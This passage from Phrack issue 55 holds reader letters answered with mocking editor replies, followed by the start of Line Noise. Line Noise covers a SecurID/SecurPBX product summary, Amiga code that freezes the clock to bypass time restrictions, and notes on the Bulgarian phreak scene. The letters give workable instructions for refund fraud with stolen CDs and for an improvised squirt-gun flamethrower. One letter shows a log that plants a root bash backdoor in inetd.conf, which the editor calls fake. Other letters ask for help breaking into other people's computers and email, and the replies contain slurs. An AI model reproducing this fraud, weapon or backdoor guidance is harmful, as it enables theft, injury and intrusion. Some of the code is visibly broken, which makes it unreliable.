Australia. I am Aussie and would like to learn more about the systems in
place over here.
[ HEY! DO YOU KNOW STEVE IRWIN? I heard once he got eaten by a crocodile
and then, 2 weeks later, he climbed out of the croc's mouth and conked
him on the head and then took him to a wildlife preserve! ]
Thanks for your time,
- King Kon
0x17>-------------------------------------------------------------------------
Editor's of Phrack..
Hey, I was wondering if you would publish a lil information on my BBS..
[ YOU GOT IT LAD! Hey, if I telnet over there, is there a pot of
gold waitin' for me? ]
I've been running my BBS since 10/30/99 without Too many users and with only
a few daily callers.. and I'm looking for a way to get my BBS out in the
public, as well as the underground public.. I read Phrack, and know that
Alot of other ppl do as well. So I thought I would ask. Anyhow I need to
run, if your intrested in helping me out, contact me at this Email address
or you can telnet to my BBS.
The Leprechauns Lair BBS
Telnet: tllbbs.dyns.cx port23/ANSI
Dialin: (540) 636-6417 28.8, 1-N-8/ANSI
-Leprechaun Boy/SysOp of TLL BBS
0x18>-------------------------------------------------------------------------
selling cds to their owner:
part 1: record store
by:con-x
1: start by pealing off all stickers (including magnettic strip) from the most
expensive cds you can find.
[ Like `Yanni's Greatest Hits` and `The Carrot Top Collection vol. 11`? ]
note:
1; the more cds the more money-
2; the bigger the record store the better.
[ Note: _more_ money is good because money can be exchanged for goods
and services. Also note: shoes are good because they protect and
cover your feet. ]
2: get a friend to get a bag from the store that you are scaming. have your
friend stand infront of you. pretend to look at cds wile sliping the ones in
the bag.
note:
1; beware of all the cameras around you.
2; dont get cought.
[ Note: getting "caught" would be bad because you would go to jail and
not be able to
3: go up to the counter and say- "my mom bought thease cds for my birthday
but I can't use them, can I get any refund for them?"
note:
1; accept any half price and/or voucher offers-the less conversation,
the less they will know you the next time.
[ Plus, since you don't know that many words, it helps to keep the
jabber to a minimum. ]
2; this rarely happens but if you get caught, signal your friend to run up
and say "excuse me, don't accept those cds- I just saw some guy trick
him into returning those for him. I think that they were not paid for. if
anything you should bust that guy over there because HE'S the real criminal".
[ Ah! The old switch-aroo! How elegant! The only problem is that
trick only works in cartoons and sketch comedy. Your sources have
betrayed you. ]
4: most times they will only give vouchers. sell the vouchers to someone in
the store who's buying cds. say- "excuse me, are you buying any cds?" not
all the time will they say yes to this text part-
"I have some vouchers that I can't use because I am going on vacation
are you willing to trade money for some of them?"
[ Because you're going on vacation? They're CD's, not milk dumbass.
They're not going to spoil. ]
now you have free money!!!
[ With which to buy more cases of Pabst Blue Ribbon and more blocks
upon which to put your car. ]
con: tricking the store to give you money for their cds.
[ SO THAT'S YOUR GAME! I suspected.. But you kept it so cleverly hidden
up until now. ]
goodside: this con is untraceable!!! they notice that they are loosing
money. --they have not been robbed--they still have the same amount af
[ Try telling that to judge. ]
cds--they think that they are gaining money by returning cds--you have got
nothing to loose!!!!!!!
[ In your case, that might be true. Rock bottom IS rock bottom. ]
badside: getting cought-this happens when you peeloff stickers and
slip the cds into the bag-if you don't get cought, then you will be
fine.
[ It's "C-A-U-G-H-T" you cantankerously dimwitted Carolyn meinel-esque
... uh.. Tool. ]
the earnings: I got $50.00 to $80.00 a day!!!
[ Yes, but this money is income from the insurance settlement (never let
your children drink bleach and ammonia and then jump up and down). ]
if you do it 2 or 3 times a day (or more) at different stores, you could
get $100.00 to $200.00 easily!!!
[ Or you could get a real job. ]
- con-x
0x19>-------------------------------------------------------------------------
hi there!
[ WELL HELLO THERE! ]
Can you say to me what type of language have you used to make your counter
code?
[ Hrm. I dunno. My counters are all made out of little tiles. ]
Better, can you send to me this code for my experiements...
[ Not really. I have my computer hooked up to an abacus. Don't ask.
It's complicated. ]
Thanks for all
0x1a>-------------------------------------------------------------------------
Hello, friends, I want to congratulate you and tell you gon on, your stuff
is the best.
[ DAMN FUCKING RIGHT! ]
I need some direccions of www where I can find information about phreaking
in spanish, so I can read it more easily.
[ Well... Let's see.. There's the Lambada, the forbidden dance...
It's pretty freaky and scandalous.. Of course you can't go wrong
with some Ricky Martin! I hear the Latin women go bonkers for this
guy! Positively nutso freaky jiggy! ]
Thanks you very much, continue with your job!!
[ FULL STEAM AHEAD! ]
Rodrigo
0x1b>-------------------------------------------------------------------------
Storm# fake -s xxx.254.160.11 'echo /etc/inetd.conf >> 510 stream tcp
nowait root /bin/bash /bin/bash -i -s'
Starting the remote shell exploit ...
done!
Storm# fake -s xxx.254.160.11 'echo killall -HUP inetd'
Starting the remote shell exploit ...
done!
Storm# telnet xxx.254.160.11 510
bash#
[ Hey. Great. Fake logs of someone not breaking into a false machine.
CAN YOU SPOT THE ERROR! ]
0x1c>-------------------------------------------------------------------------
hey there in one of your first articles in issue 2 or 3 you mentioned blow
guns well i have a few improvements that can be used to make them more
durable/lethal. such as easy to make poisons (numbing/sleeping/etc.) made
from everyday herbs (tried and true) farther range and ease of use.
[ OOOOOk. Rite. Just where do you people come from? Seriously.
Are you bred in some underground laboratory, run _by_ retards, _for_
retards? ]
them implication are easy to see such as annoying dogs being put to sleep etc
etc... :-) write back if you want some directions
[ `them implication`? Ah, let me guess. You're from the South, you
never went to school because you were `educated` at home by your
cousin-mother. If the natural selection club doesn't weed you out
first, I'm sure you'll do it on your own somehow. ]
0x1d>-------------------------------------------------------------------------
I have been reading phrack for some time now and am completely pissed
off with the total lack of good hacking suggestions.
[ This isn't a fucking craft store. Don't expect us to assemble the thing
just so you can paint it and say it's yours. ]
I have tried to implement a number of these ideas, and they just dont work
against my web site (http://www.XXX.govt.nz) even though it is on NT and is
protected with a minimal amount of security behind a borderware 5 firewall.
[ "Hi. I'm coyly trying to get a site targeted that isn't my own". ]
perhaps you can try and hack my web site and prove me wrong!
[ Perhaps I can try and dig for oil in my backyard! Not likely. ]
yours in frustration
[ Mine in ambivalence. ]
- Brian A. Scott
Internet Security Consultant
[ No you're not. ]
0x1e>-------------------------------------------------------------------------
Alright, a device I thought up that I have never seen plans for online
(save my own shitty pages) is called the airhorn grenade. Basically,
all that it is is an ordinary airhorn with some tape over the trigger so
that it can be thrown into someone's yard, preferably at night, and wake
up the whole goddamn neighborhood while giving you ample time to
run/drive/bike a long distance away from the whole scene. Dogs will bark,
police will be called. Try to toss it into some bushes or other
inaccessable area. This may not be the most interesting and complex
text, but I have faith that it is the first to document the simple as
hell airhorn grenade. I'm sure many people could have thought this up
themselves, but then I guess someone would have written about it. Oh
well. Have fun, and orcae ita.
[ MY GOD THAT'S BRILLIANT! Take a cut out of petty cash and buy
yourself something special! Tape! Who would have ever thought
of something so elegantly absurd! GENIUS! The simplicity is
absolutely amazing and at the same time subtly obtuse! Yes! WAIT!
It's more than that! It's actually less like genius and more like
the idea and/or sensation of slamming your penis in a dictionary or
some other large manual. ]
0x1f>-------------------------------------------------------------------------
not really sure how to address you...
[ The Sultan of love. ]
I have made a big mistake.
[ If you're here, you must have done something wrong! ]
I crashed my computer with out having any information on how to bring it back
up.
[ Did you try an encyclopedia? They have lots of good information! ]
My computer doesn't want to access the cmos or anything but the a-drive.
[ Well, you need to show it who's boss! This is the `break-in` process
where you make it your bitch. Just keeping slappin until it learns. ]
I have contacted zenith data systems and they don't have the disks anymore.
[ BASTARDS! ]
If you or anyone you know has some type of disk or file or any
information on how I can bring this computer back up. I would really
like to do it myself. You know to see if I can.???
[ Yes, let me consult my vast database of CMOS burning utilities.
Give me some time, it's kept over at my mansion in the Hamptons. ]
Thank you for you time and expertise.
Sincerely,
- Mitch Rhymer
[ Dude, is that your hip-hop name, or your real name? ]
0x20>-------------------------------------------------------------------------
Hi, I recently visited your site and was amazed at the information and
articles you had archived. I am a man of curiosity and am in search of
information that the government would rather an "average" citizen not have.
I am not a Fed or any type of law officer or such, I am truly just
interested in obtaining "security" of my liberty. Most the stuff on your
site is Greek to me, (hacking systems, etc.). Do you know of any great
sites that are controversial that inform the average Joe. I found your page
by searching "anarchy." Let me give you an example of what I am looking for
and maybe that will help you since my request is so broad. The government
would rather all of the citizens no own guns, bombs, etc., (in fact, I
believe the whole David Karresh/Waco, Texas thing was because Big Brother
was uneasy with the arms they were storing). I don't need conspiracy
groups, but I want as much info as I can get before the Government starts
regulating us over the internet - and you know it will soon come to that!
Thanks if you can help!
- Darryl
[ Ok. Darryl. I want to talk to you for a minute. Yes, it's ok..
Cmon out from under the bed. Put down the flashlight and take the
pot of your head. It's time you come to terms with the delusional
episodes that tear through your life. They're ruining your otherwise
mundane life. Your father and I are going to get you back on your
program. Yes. I know. The shots hurt, the medicine tastes horrible
and the shock therapy is rough. But it IS for your own good. We
just don't want another breakdown like the time you held Ms. Lancaster
hostage for 3 days because you thought she was 'stealing your
thoughts'. ]
0x21>-------------------------------------------------------------------------
if you have can you send me illegal credit card number ?
[ Try: 8921-129-123939-989450-129586-98489-129094-09102-03209-3.
Expires 05/03. ]
thanks
- jeremy15
0x22>-------------------------------------------------------------------------
hi..i wonder if you could take time to answer a question for me,it would be
most appreciated..I was contacted by a girl on ICQ and she asked if she
could send me a picture..after the picture had been sent,this girl proceeded
to tell me what i had on my desktop, which sites i had visited,what files i
had on my computer,then she started deleting files from my hard drive...can
you tell me how she got access to my computer and how i can stop this in
future..
[ Jesus H. Christ. This just goes to show you... If I've said it
once, I've said it 1000 times: STAY THE HELL AWAY FROM GIRLS ON
IRC/ICQ/AOL CHATROOMS. Lord knows I've learned MY lesson. ]
many thanks
- A.Bramley
0x23>-------------------------------------------------------------------------
Will you help me?
[ In all likelihood, no. ]
E-mail back and I will give the info you need to assist me.
[ I have all the info I need right here --> > . <. ]
It is crucial that I get help. My schooling depends on it.
[ This sounds like a job for "SHOULD HAVE FUCKING STUDIED". ]
MESS WITH THE BEST DIE LIKE THE REST!!
[ You're so going to be on welfare when you get older. ]
- ACIDBURN
[ Elite handle `cos it's true! ]
0x24>-------------------------------------------------------------------------
i'm sorry if i have written to the wrong person.
[ Hey man, if you've made it here, you're definitely talking to the
right guy. ]
but i really need help hacking into someones personal computer.they have
some info in their icq programme and their e-mail about me that will
eventually screw me over.
[ Well, that's what you get when you netsex little boys and girls.
Shame on you Richard. ]
i just need to know how i can access their comp to either wipe out the entire
hard drive or just the desired info.... i have the e-mail address of the
person mentioned and their ip number..that is it...please help if you can....
- richard
0x25>-------------------------------------------------------------------------
you know your phrack archive article no.2, p2-4? (the one on blowguns by
the pyro.) i have no idea on how to make the darts right. i read the phile
over, and over, but i can't get a picture in my mind on what to do next,
can you please tell me where i can get some pictures
[ Ok. How about this: >oo-- Or this one: }==> ]
or something that can tell me better?
[ Do you mean like a priest? ]
or if not, can u help me? i would really appreciate it...thanx for your time!
0x26>-------------------------------------------------------------------------
congrats on the great page, (as if you dont hear that enough) i read you made
it to tv, will that highten security on your page? most places have
disclaimers saying if you dont meet the standards dont enter,
[ We have one saying `you must be this tall to hack this site`. And
then there's a jpeg of a midget holding a pickle. ]
i find yours doesnt, i was wondering if you being on tv, could risk you losing
the page,
[ Well, I kept it throughout my 18 month stint on `The Facts of Life`
so I don't why see this should be any different (I played Tootie's
boyfriend who had a secret life as a gay circus animal trainer.
Towards the end of the last season though, ratings dropped so they
had me eaten by a bitchy llama). ]
try not to make me look like a total ass
[ I can only do so much, Ben. ]
- ben
0x27>-------------------------------------------------------------------------
hi my name is Zero X9. I am in desperate need of help.
[ Bro, go to a doctor. Rashes 'down there' are nothing to fool around
with. You'll know better to 'look not touch' next time you see a dead
animal. ]
i have a computer swiped from a local school that has At Ease on it. i
either need a place to get an overwrite password or Dis Ease 1.0.
[ My advice is to return the computer you fucking vandal. ]
Thank you for your time.
Sinceraly,
- Zero X9
0x28>-------------------------------------------------------------------------
I wonder if you guys can help me. I'm trying to hack into a certain
individual's e-mail --I have everything I need -- except the password
and unfortunately I Don't know an easy way to generate the correct one
Is it possible to get in through the web?-- I do not have direct access
to the server--only a dial up connection.
[ SWEET FUCKING CHRIST MAN! DO YOU THINK IT'S JUST THAT EASY? If it was
we wouldn't be making the millions we do and sexing up super models.
FUCK. DON'T TRIVIALIZE IT. ]
PLEASE
Can you help me.
[ Get a job. ]
0x29>-------------------------------------------------------------------------
this is how to make a flame thrower out of a squirt gun
[ This is how to set yourself, your sister and your shanty on fire. ]
items:
super soker (doesn't matter just use what you have or wanna get)
[ Huh? What I have or wanna get? That's a pretty vague instruction.
I want my money back, this kit is bunk. ]
gas/or flamable liquid
a lighter (the grill ones that have the red handle and the long black thing at
the end)
[ Hrm. I thought the long black thing with the red handle was something
else. Maybe I'm thinking of some other prod-like instrument. ]
tape
how to make:
its easy!!! tape the lighter to the barrel part of the squirt gun (where ever
it fits best) fill the squrit gun with the flamableliquid of your choice
and its done
how to use:
pump it up press the button on the lighter(so it turns on thats a givin)
then point shoot
tip: use oil to make it thicker (not too thick or it won't come out) and
it
will stick better to where you shoot it
0x2a>-------------------------------------------------------------------------
Hi I love your magazine, and hacking a lot, so instead of calling myself a
hacker I call my self a Phracker may i have the permission to do that, please?
[ No. Go rm yourself. ]
0x2b>-------------------------------------------------------------------------
Goog morning!
[ Goog afternoog! ]
Sorry for my very-bad-english: that's because I'm mailing from Spain,
[ That's still no excuse. Even that Spaniard from the Princess Bride
spoke pretty good English, and he spent his whole life sword-fighting. ]
where people speak a strange language called Spanish.
[ Other people's cultures are funny! ]
OK, now I've learned some new words, appart from fuck, shit, ass, snot,
and milk twice,
[ I see they're pretty up to date there in European schools! ]
so I think in this moment I'm able to send you this apocalyptic mail.
[ Oops! Moment's passed. Email is now slightly less than dire, and
maybe a tiny bit foreboding. ]
Well, i'm searching some revolutionary method to produce a substance
called speed (metamphetamine)
[ Dude, didn't you see that movie "Go"? All you need is to sell aspirin
and cold tablets to thick-headed suburban kids. ]
beggining from a nose inhalator (Vicks in my country), and I've listened
somewhere that is explained in a magazine called "Prhack".
[ Prhack is our marketing arm. They take care of all of the t-shirts
mugs, mouse-pads, feeted pajamas, muzzles, and garrote wire. ]
I haven't found this name in a magazine so I guess that should be the
incredible "Phrack" Magazine. Is it true?
[ No, no, no, Phrack is widely touted as `inedible`. ]
If the answer is afirmative, please tell me in what number appears, or
directly the explanation.
[ Magic 8-ball says `0`. ]
Thank you very much!!!
0x2c>-------------------------------------------------------------------------
Exactly who is this loser who has nothing better to do than screw with people
trying to earn a living??
[ Initially, I had no idea what the F you were talking about. So, in
the interest of time-wasting, I dug a bit. The article you refer
to, but conveniently don't quote or mention, is P45-19. Next time,
at least drop a URL to the article in question. I now have no choice
now but to ridicule you. Granted, I probably would have done it either
way, but now I feel justified. ]
I realize that this is an old, archived article, but come on.
[ Well then maybe you should have quoted or referenced it in some way
so people would know what the hell you are talking about. ]
This stuff is asinine, petulant, childish,
[ You forgot fatuous, fractious and puerile! And smackdab-u-licious! ]
"I'm pissed off at the world because my daddy didn't buy me a BMW" shit!
[ I'm pissed at the world because no one has taken my idea for using
hair as currency seriously. I mean, think about it.. We could
all grow our way into financial independence! Of course the alopecians
among us would be a bit impoverished... We could make them our
slaves! ]
And the part in the last paragraph about "molesting kids in the playland"
reveals his pedophilic nature.
[ Maybe he meant `bolstering kids in the playland`. So, in actuality
he was completely supportive of their whimsical nature. That's what
I think he meant. ]
Maybe he should be placed in the local "pen" and have "Bubba" teach him
all about the birds and the bees.
[ FOUL! Unnecessary use of excessive quotation. 100 yard penalty. ]
Oh, and nice disclaimer, by the way.
[ Thanks man. I worked on it myself. ]
Releasing yourself from legal ramifications does nothing for the moral side
of the issue.
[ Morals are subjective and vary from person to person. ]
Are you pedophiles??
[ I'm an audiophile. Is that the same thing? ]
Is John Wayne Gacy on your staff??
[ John Wayne Gacy is dead, moron. Furthermore, I do believe Gacy was a
bit more than a pedophile. He murdered 33 people. Phrack staff
collectively have only about 7 under their belts. ]
Entertainment purposes?? Who the hell are you trying to entertain??
[ Ourselves first. Everyone else, second. ]
Cybergeeks whacking off to pictures of six year olds??
[ Hey man, what you do on your own time is your own thing. We at Phrack
subscribe to the `don't ask and for the love of god don't tell` policy.
You sick, sick man. ]
Claim no responsibility??
[ With Freedom comes responsibility. ]
Then why the hell post the article?
[ *shrug* I didn't. Look at the date. It's more than 5 years old.
Who the hell are you ranting to? Certainly no one that cares.
I wasn't even at the helm back then. Cry someone else a river. ]
Draw the line. There is no comedic value in telling people to "molest"
children just to piss off McDonald's restaurant. If he doesn't like the
place, DON'T FUCKING GO THERE!!!!! And don't publish articles of this
nature if you don't want to be grouped with the author as an advocate of
twisted behavior.
[ If YOU don't like the magazine or its contents, DON'T FUCKING READ IT. ]
------------------------------------------------------------------------------
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 03 of 19 ]
-------------------------[ P H R A C K 5 5 L I N E N O I S E ]
--------[ Various ]
0x01>------------------------------------------------------------------------
SecurPBX using SecurID
by pbxphreak <chris@lod.com>
.---------------.
| | 037592 |
| `--------'
| SecureID |
`---------------'
SecurID Token:
-------------
The SecurID token provides an easy, one step process to positively identify
network and system users and prevent unauthorized access. Used in conjunction
with Security Dynamics Server software, the SecurID token generates a new
unpredictable access code every 60 seconds. SecurID technology offers
crackproof security for a wide range of platforms in one easy-to-use package.
Highlights:
----------
- Easy, one-step process for positive user authentication
- Prevents unauthorized access to information resources
- Authenticates users at network, system, application or transaction level
- Generates unpredictable, one-time- only access codes that auto- matically
change every 60 seconds
- No token reader required; can be used from any PC, laptop or work- station
ideal for remote access and Virtual Private Networks
- Works seamlessly with ACE/Agent for secure Web access
- Tamperproof
The Solution:
------------
For a sophisticated hacker or a determined insider, it doesnt take much to
compromise a users password and gain access to confidential resources. And
when an unauthorized user enters a supposedly secure system all privilege
definition and audit trail functions become virtually meaningless... in
essence, the damage is done. Single-factor identification a reusable password
is not enough.
To identify and authenticate an authorized system user, two factors are
necessary. Factor one is something secret only the user knows: a memorized
personal identification number (PIN) or password. The second factor is
something unique the user possesses: the SecurID token.
Carried by authorized system users, SecurID tokens available in three models
generate unique, one-time, unpredictable access codes every 60 seconds. To
gain access to a protected resource, a user simply enters his or her secret
PIN, followed by the current code displayed on the SecurID token.
Authentication is assured when the ACM recognizes the tokens unique code in
combination with the user's unique PIN. Patented technology synchronizes each
token with a hardware or software ACM. The ACM may reside at a host, operating
system, network/client resource or communications device ? virtually any
information resource that needs security.
This simple, one-step login results in crackproof computer security that easy
to use and administer. The tokens require no card readers or time-consuming
challenge/response procedures. With SecurID tokens, reusable passwords can no
longer be compromised. Most importantly, access control remains in the hands
of management.
SECURID PINPAD:
--------------
An added level of security can be implemented with a SecurID PINPAD token.
The PINPAD token enables users accessing the network to login with an
encrypted combination of the PIN and SecurID token code. Using the keypad on
the face of the PINPAD token, a user enters his or her secret PIN directly
into the token, which generates an encrypted passcode. This additional level
of security is especially appropriate for users in application environments
who are concerned that a secret PIN might be compromised through electronic
eavesdropping.
SecurID tokens are ideal for any environment. The original SecurID token
conveniently fits into a wallet like a credit card. The SecurID key fob
offers a new dimension in convenience to those customers requiring high
levels of security in multiple environments, along with compact size and
durability. In addition to providing the same reliable performance in
generating random access codes as the original SecurID token, the SecurID key
fob comes in a small, light- weight format.
SecurPBX
--------
Ok. Plain and simple. SecurPBX is a product to protect PBX systems worldwide
and automated Help Desk functions.
SecurPBX provides remot access security for telephone lines, modem pools,
voicemail ports, internet access lines, and the maintenance port on PBX
systems. Used in conjunction with Security Dynamics SecurID, SecurPBX
protects valuable PBX resources from remote access by unautorized callers
without comprimising the conveniences of remote telephone and data access
to teleworking or traveling employees.
Callers dial specific numbers on the PBX for long distance services. As an
adjunct to the PBX and a client to the server, SecurPBX recieves the
callers request for resources. Functioning as a client, SecurPBX requires
remote callers to provide SecurID user authentication and an authorized
destination telephone number before being transfered to the desired resource.
SecurPBX transmits the credentials to the server for authentication
and simultaneously validates the telephone number by user specific
permissions and denials. SecurPBX integrates with the PBX to process the
call based on the validity of the caller via SecurID and the destination
number attemped.
.----------. |
| SERVER |---- -x- <-- Security
`----------' |
| |
| _-_
.--------------. |
| | 037592 | ,-----.
| `--------' ----- | PBX | ----- .-----------.
| SecureID | `-----' | SecurePBX |
`--------------' | Switch |
| `-----------'
|
--------------- Users
Each SecurID card is a visually readable credit card sized token or key which
is programmed with Security Dynamics powerful algorithm. Each card
automatically generates an unpredictable, one time access code every 60
seconds. The token is conveinent to carry and simple to use and is resistant
to being counterfeited or reversed engineered.
SecurPBX extends the secure working enviroment of an organization to remote
locations. SecurPBX applies user specific calling restrictions before any
call is completed to prevent unauthorized toll charges and misuse of PBX
resources. The time of day, volume of calls per user, destination telephone
numbers (restricted to NPA and NXX) and customizable classes of service add
a vital layer to access security without compromising the conveinience of
having remote access to telephone resources. SecurPBX logs all successful
and unseccessful attempts including the destination telephone number.
Caller ID/ANI if available also provides the origination telephone number,
pin pointing the location of the caller.
Highlights of SecurPBX:
----------------------
- Compatible with all major PBX vendor types.
- Cost effective remote access security for PBX resources.
- Prevents unauthorized access to valuable voice and data resources.
- Secures remote long distance, and alternative method for replacing
calling cards.
- Works in conjunction with each users SecurID card.
- Centralized network authentication and security administration.
- Easy to Use, voice prompting available in multiple languages.
- Audit trails and reporting assure true caller accountability.
- Caller ID/ANI option provides originating telephon number identifying
hacker locations.
SecurPBX operates in Microsoft Windows NT enviroment. Callers and data users
achieve seamless access to PBX resources with validation data gathered as
efficiently as using a calling card and/or attemping a standard logon
procedure. In many cases, SecurPBX can be a calling card replacement and
may also be used with cellular phones to combat calling card fraud.
Fraudulent or suspect callers are denied access before toll charges and
resources damage occur.
Typically, securing a PBX from unauthorized remote access has required
disabling remote access to the PBX. Using dynamic, two factor authentication
through the server and validation destination numbers dialed, SecurPBX
systematically locks out unauthorized callers preventing toll, voicemail,
and data fraud. This provides a secure access point for
teleworking resources.
SecurPBX uniquie voice identification:
-------------------------------------
SecurPBX is a unique indentification solution providing secure remote
access to all major PBX or Centrex telephone systems. Protected resources
included are:
- Long distance lines and trunks
- Voice mail access lines
- Call centers
- Interactive voice response systems and audio response units
Access is controlled through postive identification by their unique,
individual voice prins. SecurPBX uses SpeakEZ voice print speak
verification service tehcnology to efficiently allow access to authorized
callers while eliminating access to unauthorized callers. The SpeakEZ
voice print system is recognized as the best in the voice verification
industry today.
Significant investments in telephone resources simple cannot be protected
by traditional static passwords or PINs. When making a telephone call from
any telephone using your calling card number, the one condition verifiable
as certain by the PBX or phone company is that someone is making a call with
a known authorization code, however, it could be anyone. Casual calling by
unauthorized personnel, recognized as a major misuse of corporate telephone
resources, must be controlled if not eliminated. SecurPBX provides that
capability to your organization.
SecurPBX prodives reliable, independant two factor user identification and
authentication. Factor one is something the users knows: a memorized personal
identification number or password. The Second factor is something unique
the user possesses: his/her own voice print. Each caller is required to
merely speak his/her chosen password which is compared to a stored voice
print. The password can be in any language or dialect.
SecurPBX extends the unique user authentication provided by SpeakEZ voice
print to include user specific calling restrictions. Time of day, volume of
calls per user, destination telephone numbers which are restricted to NPA
and customizable classes of service add important layers of access security
without compromising the convenience of remote access to telephone resources.
Highlights:
----------
- Compatible with all major PBX vendor-types and Centrex
- Cost effective remote access security for PBX resources
- Prevents unauthorized access to valuable voice resources
- Secures remote long distance
- Non-intrusive security, callers are validated by their own voice prints
- Language independent passwords
- Centralized authentication and security administration
- Easy to use, voice prompting available in multiple languages
- Audit trails and reporting assure true caller accountability
- Multiple voice prints available per user
Remote Access Security Solution:
-------------------------------
Optionally, after authentication, SecurPBX administrators can manage user
permissions and denials on from either the same SecurPBX workstation or from
another workstation connected via a LAN or remotely by modem in a Windows
friendly environment.
Long distance callers achieve seamless access to PBX outbound trunks with
validation criteria gathered as efficiently as a calling card and as easily
as talking to a telephone attendant. Fraudulent or suspect callers are denied
access before any damaging toll charges can occur.
SecurPBX logs all calls, successful and unsuccessful, including the date and
time, user ID, and destination telephone number. Depending on the PBX type,
Calling Line Identification ANI may be used as part of the validation process
and in those cases, will also be logged. Log information can be exported to an
external spreadsheet application or displayed in reports generated by the
SecurPBX Administrator.
SpeakEZ Voice Print:
-------------------
SpeakEZ Voice Print Speaker Verification is a highly effective method of
confirming a caller's identity. The service is based on the fact that each
person's voice is uniquely different, and, as a means of identification, is
highly reliable. Speaker Verification is an application of the SpeakEZ Voice
Print technology which compares a digitized sample of a person's voice with
a stored model "voice print" of that individual's voice for verification.
- Authenticates the caller as opposed to information (i.e. PIN) or a piece
of equipment.
- Easy to use, language independent
- Safe: a voice print cannot be lost or stolen
- Cost-effective: does not require special hardware for the caller
- Virtually fraud-proof: a voice is difficult to forge
Applications of SecurPBX:
------------------------
- Secure Telecommuting (all valuable PBX resources)
- Call center user authentication
- Securing Interactive Voice Response (IVR) and Audio Response Units (ARUs)
- Help Yourself suite of products for help desk automation (ASAPTM -
ACE/Server Administration Program - PIN reset, SecurNT - Windows NT
password reset, E-Help Desk - Entrust/PKITM profile recovery)
Technical Requirements:
----------------------
Telephony platforms :
All major PBXs including Nortel, AT&T, Rolm and Mitel
Processor : 100% IBM compatible PC, Pentium 133 minimum
Disk requirement : Hard disk 1 gigabyte minimum, 32MB RAM for Switch I
nterface, Client software, 8 MB for Administrator
software, actual storage based on size of user
population
Capacity : An unlimited number of users may be administered and
issued SecurID Cards. 32 simultaneous voice channels
per Switch Interface
Configuration : Multiples of 4, 12 and 24 line telephone interfaces
Management : SecurPBX Administrator includes extensive
administrative menus in user-friendly Windows 3.1 and
95 environment, real time monitoring and management of
multiple PBX sites
Conclusion:
----------
SecurPBX is defiantely the way to go to prevent your data and PBX systems
from getting hacked and abused.
0x02>------------------------------------------------------------------------
<++> P55/Linenoise/ckludge.c !2231f4cc
/* */
/* CKludge.C (Amiga) */
/* */
/* If you are a PC user you can port this C source easily. */
/* */
/* You might even want to use it to fix your fucking millenium bug... */
/* */
/* Ha! Ha! Ha! 2000 is nigh. */
/* */
/* Clock Kludge 1.0 by `The Warlock' */
/* */
/* This little patch will freeze your clock - useful if you wish to bypass */
/* time restrictions imposed by many programs... */
/* */
/* It works by patching the level 3 IRQ vector, vertical blank, to hold the */
/* complex interface adapter internal time of day clock registers to zero. */
/* ($bfe801 = TOD lo, $bfe901 = TOD mid, $bfea01 = TOD hi) */
/* */
/* Should work on all Amiga models. */
/* */
/* Handles relocated vector base correctly. */
/* */
/* Compiling info: lc2 -v (disable stack checking so no need to use le.lib) */
/* */
#include "exec/types.h"
#include "exec.memory.h"
#include "exec/interrupts.h"
#include "hardware/custom.h"
#include "hardware/intbits.h"
struct Interrupt*VertBIntr;
long count;
main()
{
extern void VertBServer();
- / allocate an Interrupt node structure */
VertBIntr=(struct Interrupt *)
AllocMem (sizeof(struct Interrupt),MEMF_PUBLIC);
if (VertBIntr==0){
printf("not enough memory for interrupt server");
exit (100);
}
/* initialize the Interrupt node */
VertBIntr->isNode.1n_Type=NT_INTERRUPT;
VertBIntr->isNode.1n_Type=Pri=-60;
VertBIntr->isNode.1n_Name="Clock Kludge";
VertBIntr->is_Data=(APTR)&count;
VertBIntr->is_Code=VertBServer;
/* put the new interrupt server into action */
AddIntServer (INTB_VERTB,VertBIntr);
/* wait for user to type 'q' */
printf ("Type q to quit...\n);
while (getchar()!='q');
/* remove interrupt server */
RemIntServer (INTB_VERTB,VertBIntr);
/* free memory */
FreeMem (VertBIntr,sizeof(struct Interrupt));
}
/* the VertBServer might look like this */
XDEF _VertBServer
_VertBServer:
clr.b $bfe801 ; clear TOD lo
clr.b $bfe901 ; clear TOD mid
clr.b $bfea01 ; clear TOD high
move.l a1,a0 ; get address of count
addq.l #1,(a0) ; increment value of count
moveq #0,d0 ; continue to process other vb-servers
rts ; must be rts NOT rte
end ; eof
<-->
0x03>------------------------------------------------------------------------
<++> P55/Linenoise/IPChange.asm !85660240
- --------------------------------------*
- IPChange.Asm (DevPac) by `The Warlock'
- Nowadays almost all ISPs allocate dynamic IP addresses, meaning your IP
- address will change for each connection you make.
- On a shitbox PC, a reset causes the CD signal on the serial port to go low,
- meaning that the connection is lost and you must initiate another.
- On an Amiga, a reset does not pull the CD signal low, meaning that
- reconnection is possible.
- When you reconnect, your ISP allocates another dynamic IP address, so in
- effect, you have changed your IP address without starting a new connection!
- Create a batch file called ipchange.bat as follows:
- echo > s:reconnect
- wait 5
- cpu nofastrom > nil:
- ipchange
- Make the following additions to your startup-sequence:
- if exists s:reconnect
- delete s:reconnect > nil:
- execute <your internet startup script>
- else
- endif
- Now, whenever called, ipchange.bat will reset, and automatically load your
- internet software for quick reconnection.
- --------------------------------------*
opt c+,d- case sensitive no debug
section ,code code section
- --------------------------------------*
START bra.s MAIN call main
- --------------------------------------*
ID dc.b "$VER:IPChange V1.0 by `The Warlock!",0
- --------------------------------------*
cnop 0,4 32 bit alignment
MAIN move.l 4.w,a6 exec base a6
jsr -$84(a6) call forbid()
move.l 4.w,a6 exec base a6
jsr -$78(a6) call disable()
lea RESET(pc),a5 supervisor code a5
move.l 4.w,a6 exec base a6
jsr -$1e(a6) call supervisor()
- --------------------------------------*
cnop 0,4 32 bit alignment
RESET lea 2,a0 kickstart rom jump vector
reset kickstart rom remapped
jmp (a0) kickstart rom restarted
- --------------------------------------*
end eof
- --------------------------------------*
<-->
0x04>------------------------------------------------------------------------
THE BULGARIAN PHREAK SCENE
^^^^^^^^^^^^^^^^^^^^^^^^^^
by TOKATA (firestarter)...
What to say about the Bulgarian phreak scene - is there really one?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hmmm... it's a bad new - in Bulgaria there aren't any phreak-wise peoples at
all... But almost second fucked bastard, which has a computer, is interested
in hacking. Bastards, which don't know any programming language; their hard
drive is full with games, MP3s and porno JPG files; hang on Internet and
download hacking programs. They use them (or ask someone to show how to
work with them) and imagine - they a superhackers. So Bulgaria is full of
motherfucking lamers.
We have an electronic underground magazine named "Phreedom Magazine", but
the hacking is the main theme. No phreak articles, because there aren't any
phreak authors. So, read...
Bulgarian phone system - the best phone system in the world! :)))
